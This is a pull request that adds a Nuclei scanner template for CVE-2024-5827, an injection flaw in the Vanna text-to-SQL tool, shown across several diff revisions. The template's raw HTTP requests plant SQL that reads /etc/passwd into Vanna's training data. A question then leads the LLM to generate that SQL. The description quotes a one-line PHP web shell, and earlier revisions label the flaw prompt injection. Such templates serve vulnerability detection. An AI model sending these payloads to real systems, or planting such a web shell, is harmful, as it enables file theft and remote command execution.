### PR TITLE
CREATE CVE-2024-5827

### DIFF
--- a/CVE-2024-5827.yaml
+++ b/CVE-2024-5827.yaml
@@ -1,12 +1,14 @@
 id: CVE-2024-5827
-info:
-  name: "Arbitrary File Write by Prompt Injection (CVE-2024-5827)"
-  author: shlee, nukunga123, harksu, taekwoo, gy741
-  severity: "high"
-  description: "Arbitrary File Write by Prompt Injection via DuckDB SQL in vanna-ai/vanna (CVE-2023-6977)."
-  tags: command-execution, sql, cve, prompt-injection
 
-requests:
+info:
+  name: Vanna - SQL injection
+  author: olfloralo, nukunga, harksu, nechyo, gy741
+  severity: high
+  description: |
+    Vanna v0.3.4 is vulnerable to SQL injection in its DuckDB integration exposed to its Flask Web APIs. Attackers can inject malicious SQL training data and generate corresponding queries to write arbitrary files on the victim's file system, such as backdoor.php with contents `<?php system($_GET[0]); ?>`. This can lead to command execution or the creation of backdoors.
+  tags: cve,cve2024,vanna,sqli
+
+http:
   - raw:
       - |
         POST /sql HTTP/1.1
@@ -15,16 +17,17 @@ requests:
 
         {"sql": "SELECT pg_read_file('/etc/passwd', 0, 1000);"}
 
+    matchers-condition: and
     matchers:
-      - type: dsl
-        dsl:
-          - "Content-Type: application/json"
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
 
       - type: status
         status:
           - 200
 
-      - type: regex
-        regex:
-          - "root:[^:]*:0:0"
-        part: body
+      - type: word
+        part: header
+        words:
+          - 'application/json'

--- a/CVE-2024-5827.yaml
+++ b/CVE-2024-5827.yaml
@@ -1,0 +1,30 @@
+id: CVE-2024-5827
+info:
+  name: "Arbitrary File Write by Prompt Injection (CVE-2024-5827)"
+  author: shlee, nukunga123, harksu, taekwoo, gy741
+  severity: "high"
+  description: "Arbitrary File Write by Prompt Injection via DuckDB SQL in vanna-ai/vanna (CVE-2023-6977)."
+  tags: command-execution, sql, cve, prompt-injection
+
+requests:
+  - raw:
+      - |
+        POST /sql HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"sql": "SELECT pg_read_file('/etc/passwd', 0, 1000);"}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "Content-Type: application/json"
+
+      - type: status
+        status:
+          - 200
+
+      - type: regex
+        regex:
+          - "root:[^:]*:0:0"
+        part: body

--- a/http/cves/2024/CVE-2024-5827.yaml
+++ b/http/cves/2024/CVE-2024-5827.yaml
@@ -2,20 +2,39 @@ id: CVE-2024-5827
 
 info:
   name: Vanna - SQL injection
-  author: olfloralo, nukunga, harksu, nechyo, gy741
+  author: olfloralo,nukunga,harksu,nechyo,gy741
   severity: high
   description: |
     Vanna v0.3.4 is vulnerable to SQL injection in its DuckDB integration exposed to its Flask Web APIs. Attackers can inject malicious SQL training data and generate corresponding queries to write arbitrary files on the victim's file system, such as backdoor.php with contents `<?php system($_GET[0]); ?>`. This can lead to command execution or the creation of backdoors.
+  reference:
+    - https://huntr.com/bounties/a3f913d6-c717-4528-b974-26d8d9e839ca
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-5827
+  metadata:
+    max-request: 2
+    fofa-query: body='vanna.ai'
   tags: cve,cve2024,vanna,sqli
+
+flow: http(1) && http(2)
 
 http:
   - raw:
       - |
-        POST /sql HTTP/1.1
+        POST /api/v0/train HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/json
 
-        {"sql": "SELECT pg_read_file('/etc/passwd', 0, 1000);"}
+        {"sql":"SELECT pg_read_file('/etc/passwd', 0, 1000);"}
+
+    matchers:
+      - type: word
+        words:
+          - 'id":'
+        internal: true
+
+  - raw:
+      - |
+        GET /api/v0/generate_sql?question=What%20is%20the%20content%20of%20the%20first%201000%20characters%20of%20the%20%2Fetc%2Fpasswd%20file? HTTP/1.1
+        Host: {{Hostname}}
 
     matchers-condition: and
     matchers:

--- a/http/cves/2024/CVE-2024-5827.yaml
+++ b/http/cves/2024/CVE-2024-5827.yaml
@@ -3,13 +3,23 @@ id: CVE-2024-5827
 info:
   name: Vanna - SQL injection
   author: olfloralo,nukunga,harksu,nechyo,gy741
-  severity: high
+  severity: critical
   description: |
     Vanna v0.3.4 is vulnerable to SQL injection in its DuckDB integration exposed to its Flask Web APIs. Attackers can inject malicious SQL training data and generate corresponding queries to write arbitrary files on the victim's file system, such as backdoor.php with contents `<?php system($_GET[0]); ?>`. This can lead to command execution or the creation of backdoors.
   reference:
     - https://huntr.com/bounties/a3f913d6-c717-4528-b974-26d8d9e839ca
     - https://nvd.nist.gov/vuln/detail/CVE-2024-5827
+    - https://huntr.com/bounties/e4e64a51-618b-41d0-8f56-1d2146d8825e
+    - https://github.com/fkie-cad/nvd-json-data-feeds
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2024-5827
+    cwe-id: CWE-434
+    epss-score: 0.00043
+    epss-percentile: 0.09524
   metadata:
+    verified: true
     max-request: 2
     fofa-query: body='vanna.ai'
   tags: cve,cve2024,vanna,sqli
@@ -39,6 +49,7 @@ http:
     matchers-condition: and
     matchers:
       - type: regex
+        part: body
         regex:
           - "root:.*:0:0:"
 


### PR DESCRIPTION
## Template / PR Information



- Added CVE-2024-5827
```
Vanna v0.3.4 is vulnerable to SQL injection in its DuckDB integration exposed to its Flask Web APIs. Attackers can inject malicious SQL training data and generate corresponding queries to write arbitrary files on the victim's file system, such as backdoor.php with contents `<?php system($_GET[0]); ?>`. This can lead to command execution or the creation of backdoors.
```


### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)